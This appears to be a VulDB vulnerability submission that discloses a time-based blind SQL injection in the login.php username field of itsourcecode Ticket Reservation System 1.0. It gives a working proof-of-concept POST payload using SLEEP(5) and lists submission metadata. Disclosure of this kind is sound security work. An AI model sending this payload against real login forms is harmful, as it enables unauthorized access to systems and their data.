Submit #383643: itsourcecode Ticket Reservation System 1.0 SQLi login.php (information)

Title: itsourcecode Ticket Reservation System 1.0 SQLi login.php
Description: In the login.php page, because the username field is not strictly filtered, it is possible to achieve SQL injection by constructing a specially crafted data packet.
--------------POC--------------
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 9494 FROM (SELECT(SLEEP(5)))FbJR) AND 'GlKq'='GlKq&password=123123
Source: ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE10-1.md
User: Dee.Mirage (UID 71702)
Submission: 31/07/2024 07:21 (2 years ago)
Moderation: 02/08/2024 23:43 (3 days later)
Status: Accepted
VulDB entry: 273529 [itsourcecode Ticket Reservation System 1.0 Login Page login.php username SQL injection]
Points: 20
